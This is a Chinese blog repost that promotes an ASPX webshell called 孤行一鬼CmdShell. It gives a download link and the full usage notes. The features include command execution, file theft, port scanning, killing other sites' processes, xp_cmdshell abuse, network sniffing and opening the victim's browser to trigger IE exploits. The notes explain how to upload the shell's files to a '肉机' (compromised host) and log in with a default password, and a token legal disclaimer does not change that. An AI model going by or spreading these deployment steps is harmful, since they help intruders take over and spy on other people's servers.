转自:Link's blog http://hi.baidu.com/linkhack/blog/item/ebffe4ceb1761534f9dc611a.html
事先说明 。。这个不是bin的修改版。是老鬼独自开发的 C#开发
欢迎转载 。。
完整下载地址: http://link.idc.03389.com/laogui.rar
我把使用说明.txt发出来让大家尝尝鲜:
孤行一鬼CmdShell.aspx工具使用说明:
注意:此程序只授权网站管理员、网站及服务器维护人员、安全爱好者等安全检测之用,请勿用于非法用途,否则由此引起的一切后果与工具作者无关,此说明文件与程序同时发布,若有转载,请勿删除此文件!请保持发布的完整性。
工具说明: 此工具为孤行一鬼闲暇之余随便写的练手之作,由于没有太多的时间和精力去写,再加上老鬼的技术很菜,所以目前此工具功能很弱,主要有以下几个:
一、 磁盘、文件、目录操作及查看 (删除、编辑功能没有开放)
二、 CMD运行器
三、 文件打包下载 (为了防止误操作,在线解压功能被屏蔽,只支持本地解压)
四、 网络配置信息查看(完全是鸡肋,只当写着玩)
五、 端口扫描器一(不是多线程扫描,有时间的话,在下个版本中会出多线程扫描)
六、 端口扫描器二
七、进程管理器(在USER权限下可以杀掉同一服务器的其它站点进程,在ADMIN权限下为所欲为)
八、 网上邻居查看器(可以查看一些网络共享资源,可能有时间会用得上吧,嘿嘿,瞎写)
九、 浏览器操作器(用肉机的浏览器去打开一个网址,写这个的目的是让服务器中通过IE漏洞中标,或是一些其它用途,老鬼写完后一直没有测试,只是留了个位置,说不定哪天能用得上吧,^_^)
十、 扫描可写目录权限 (网上不知道哪位前辈写的,直接照搬过来了,版权归原作者)
十一、 遍历ACL值(TNND,水平忒菜,没有搞定,好像只有ADMINISTRATOR权限的才可以,USER权限下好像遍历不了,只是留了个思路,占了个位置,是个鸡肋)
十二、sa权限dbo.xp_cmdshell利用工具(这个就不多说了。不能在SQL2005下运行,有时间再研究)
十三、WMI重启(有时间我们知道远程管理员的用户名和密码,而无法用WEBSHELL重启远程肉机,所以有了这个东东,不过是个空壳子,老鬼没有时间写就发布出来了,大家别骂哦!)
十四、WEBSNIFFER 这个可是重拳产品,功能强大,杀人越货不可少的东东,不过代码是CNQING写的,我只是集成到我的SHELL中进来了,版权归CNQING所有。另外CNQING的嗅探器代码中,由于停止按钮会将服务器的SESSION置空,所以会让WEBSHELL重新登录,嘿嘿,老鬼发现了,懒得改,大家先凑合着用,老鬼有时间再改。
大概就这些功能,其它功能都是占了个位置,没有写代码,大家别仍砖头!
文件说明:
使用说明.txt 你正在看的这个文件,不用上传到肉机 PrecompiledApp.config 预编译配置文件,使用前上传到肉机根目录下。 bin目录 使用前请将这个目录及该目录下的两个文件 App_Web_cmdshell.aspx.cdcab7d2.dll cmdshell.aspx.cdcab7d2.compiled 上传至肉机网站目录的根目录下,要是肉机网站根目录下已存在BIN目录的话,哪么就把 App_Web_cmdshell.aspx.cdcab7d2.dll cmdshell.aspx.cdcab7d2.compiled 这两个文件传到肉机BIN目录就即可。 unzip.exe 这个东东不用上传到肉机上去。用网马把远程文件在线打包下来后,用这个东东解开。解到最后的时候弹出一个提示,不用理它就行了,懒得去调试代码。此工具在。NET环境上运行,测试环境为。NET 2.0。
使用方法:
文件全部上传完成以后,我们可以用以下的地址来访问,比如我们测试的地址是:
www.abc.com,哪么我们可以用这个地址http://www.abc.com/cmdshell.aspx来访问,不要担心页面不存在,默认密码是老鬼的QQ号 147399120
最后老鬼的QQ号:147399120 欢迎大家加我,多多批评,多多指教。
喜欢C#开发的朋友们加群 30369215 喜欢网络安全的朋友们请加群 1961659
加之前请注明验证消息“CMDSHELL”,否则会被视为广告者给拒绝。 |